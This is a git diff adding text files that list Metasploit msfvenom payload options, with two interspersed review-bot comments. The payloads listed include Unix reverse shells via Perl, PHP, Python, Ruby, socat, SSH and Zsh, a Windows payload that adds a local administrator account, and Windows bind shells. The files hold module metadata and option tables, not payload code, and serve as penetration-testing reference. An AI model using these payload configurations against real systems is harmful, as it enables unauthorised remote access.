@@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Perl) + Module: payload/cmd/unix/reverse_perl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 219 + Rank: Normal + +Provided by: + cazz + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via perl + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt new file mode 100644 index 0000000..8b8b5e2 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_perl_ssl.txt 
@@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via perl) + Module: payload/cmd/unix/reverse_perl_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 158 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via perl, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt new file mode 100644 index 0000000..9f5da1c --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_php_ssl.txt 
@@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via php) + Module: payload/cmd/unix/reverse_php_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 264 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via php, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PHPPath php yes The path to the PHP executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_python.txt b/msfvenom/payload_options/cmd-unix-reverse_python.txt new file mode 100644 index 0000000..217b988 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_python.txt 
@@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Reverse TCP (via Python) + Module: payload/cmd/unix/reverse_python + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 348 + Rank: Normal + +Provided by: + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELL /bin/sh yes The system shell to use + +Description: + Connect back and create a command shell via Python + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PythonPath python yes The path to the Python executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt new file mode 100644 index 0000000..4da0830 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-unix-reverse_python_ssl.txt 
@@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via python) + Module: payload/cmd/unix/reverse_python_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 464 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via python, uses SSL, encodes with base64 by design. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PythonPath python yes The path to the Python executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_r.txt b/msfvenom/payload_options/cmd-unix-reverse_r.txt new file mode 100644 index 0000000..36433d6 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_r.txt 
@@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via R) + Module: payload/cmd/unix/reverse_r + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 142 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via R + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + RPath R yes The path to the R executable + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ruby.txt b/msfvenom/payload_options/cmd-unix-reverse_ruby.txt new file mode 100644 index 0000000..461dfb3 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ruby.txt 
@@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Ruby) + Module: payload/cmd/unix/reverse_ruby + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 118 + Rank: Normal + +Provided by: + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ruby + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + RubyPath ruby yes The path to the Ruby executable + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt b/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt new file mode 100644 index 0000000..35bc738 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ruby_ssl.txt 
@@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP SSL (via Ruby) + Module: payload/cmd/unix/reverse_ruby_ssl + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 170 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Ruby, uses SSL + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + RubyPath ruby yes The path to the Ruby executable + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt new file mode 100644 index 0000000..39a2429 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_sctp.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse SCTP (via socat) + Module: payload/cmd/unix/reverse_socat_sctp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 73 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt new file mode 100644 index 0000000..cfaab9e --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_tcp.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (via socat) + Module: payload/cmd/unix/reverse_socat_tcp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 59 + Rank: Normal + +Provided by: + jheysel-r7 + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt b/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt new file mode 100644 index 0000000..4758e1f --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_socat_udp.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse UDP (via socat) + Module: payload/cmd/unix/reverse_socat_udp + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 72 + Rank: Normal + +Provided by: + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via socat + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + BashPath bash yes The path to the Bash executable + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SocatPath socat yes The path to the Socat executable + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_ssh.txt b/msfvenom/payload_options/cmd-unix-reverse_ssh.txt new file mode 100644 index 0000000..53c0e57 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_ssh.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP SSH + Module: payload/cmd/unix/reverse_ssh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 146 + Rank: Normal + +Provided by: + RageLtMan + hirura + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 22 yes The listen port + +Description: + Connect back and create a command shell via SSH + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + SSHPath ssh yes The path to the SSH executable + ShellPath /bin/sh yes The path to the shell to execute + Ssh::Version SSH-2.0-OpenSSH_5.3p1 yes The SSH version string to provide + SshClientOptions UserKnownHostsFile=/dev/null StrictHostKeyChecking=no no Space separated options for the ssh client + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt b/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt new file mode 100644 index 0000000..e615038 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-unix-reverse_ssl_double_telnet.txt @@ -0,0 +1,40 @@ + + Name: Unix Command Shell, Double Reverse TCP SSL (telnet) + Module: payload/cmd/unix/reverse_ssl_double_telnet + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 106 + Rank: Normal + +Provided by: + hdm + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + HandlerSSLCert no Path to a SSL certificate in unified PEM format + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + ShellPath sh yes The path to the shell to execute + TelnetPath telnet yes The path to the telnet executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
diff --git a/msfvenom/payload_options/cmd-unix-reverse_stub.txt b/msfvenom/payload_options/cmd-unix-reverse_stub.txt new file mode 100644 index 0000000..2c82819 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_stub.txt @@ -0,0 +1,38 @@ + + Name: Unix Command Shell, Reverse TCP (stub) + Module: payload/cmd/unix/reverse_stub + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell through an inbound connection (stub only, no payload) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
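Review bot: `Total size: 0` in the cmd-unix-reverse_stub.txt hunk is correct (its Description reads "stub only, no payload"), but in a directory of size-bearing dumps it looks like a failed generation; a README line listing the modules that legitimately report size 0 would prevent that misreading. The same applies to the cmd/windows/generic hunk later in this patch, which also reports `Total size: 0` because its whole output is the user-supplied, required CMD option.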
diff --git a/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt b/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt new file mode 100644 index 0000000..cc5e7d4 --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_tclsh.txt @@ -0,0 +1,39 @@ + + Name: Unix Command Shell, Reverse TCP (via Tclsh) + Module: payload/cmd/unix/reverse_tclsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 169 + Rank: Normal + +Provided by: + bcoles + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Creates an interactive shell via Tclsh + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + TCLSHPath tclsh yes The path to the TCLSH executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + 
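Review bot: Missing provenance: none of these dumps (this cmd-unix-reverse_tclsh.txt hunk included) records the msfvenom invocation or the Metasploit Framework version that produced it, so a reader cannot tell whether a row such as `StagerRetryCount 10` or `ReverseListenerThreaded false` still matches their installed framework. Suggest the generator prepend a one-line header per file (command used and `msfvenom --version` output) or that a single VERSION/README file be committed alongside the directory.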
diff --git a/msfvenom/payload_options/cmd-unix-reverse_zsh.txt b/msfvenom/payload_options/cmd-unix-reverse_zsh.txt new file mode 100644 index 0000000..ef6edef --- /dev/null +++ b/msfvenom/payload_options/cmd-unix-reverse_zsh.txt 
@@ -0,0 +1,41 @@ + + Name: Unix Command Shell, Reverse TCP (via Zsh) + Module: payload/cmd/unix/reverse_zsh + Platform: Unix + Arch: cmd +Needs Admin: No + Total size: 79 + Rank: Normal + +Provided by: + Doug Prostko + Wang Yihang + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + +Description: + Connect back and create a command shell via Zsh. Note: Although Zsh is often + available, please be aware it isn't usually installed by default. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + ZSHPath zsh yes The path to the ZSH executable + diff --git a/msfvenom/payload_options/cmd-windows-adduser.txt b/msfvenom/payload_options/cmd-windows-adduser.txt new file mode 100644 index 0000000..4160bf2 
--- /dev/null +++ b/msfvenom/payload_options/cmd-windows-adduser.txt @@ -0,0 +1,42 @@ + + Name: Windows Execute net user /ADD CMD + Module: payload/cmd/windows/adduser + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 97 + Rank: Normal + +Provided by: + hdm + scriptjunkie + Chris John Riley + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CUSTOM no Custom group name to be used instead of default +PASS Metasploit$1 yes The password for this user +USER metasploit yes The username to create +WMIC false yes Use WMIC on the target to resolve administrators group + +Description: + Create a new user and add them to local administration group. + + Note: The specified password is checked for common complexity + requirements to prevent the target machine rejecting the user + for failing to meet policy requirements. + + Complexity check: 8-14 chars (1 UPPER, 1 lower, 1 digit/special) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + COMPLEXITY true yes Check password for complexity rules + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_lua.txt b/msfvenom/payload_options/cmd-windows-bind_lua.txt new file mode 100644 index 0000000..a7437c6 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_lua.txt 
@@ -0,0 +1,32 @@ + + Name: Windows Command Shell, Bind TCP (via Lua) + Module: payload/cmd/windows/bind_lua + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 218 + Rank: Normal + +Provided by: + xistence + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via Lua + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + LuaPath lua yes The path to the Lua executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_perl.txt b/msfvenom/payload_options/cmd-windows-bind_perl.txt new file mode 100644 index 0000000..43fd199 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_perl.txt 
@@ -0,0 +1,34 @@ + + Name: Windows Command Shell, Bind TCP (via Perl) + Module: payload/cmd/windows/bind_perl + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 139 + Rank: Normal + +Provided by: + Samy + cazz + aushack + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +LPORT 4444 yes The listen port +RHOST no The target address + +Description: + Listen for a connection and spawn a command shell via perl (persistent) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + PerlPath perl yes The path to the Perl executable + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt b/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt new file mode 100644 index 0000000..bb28656 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-bind_perl_ipv6.txt 
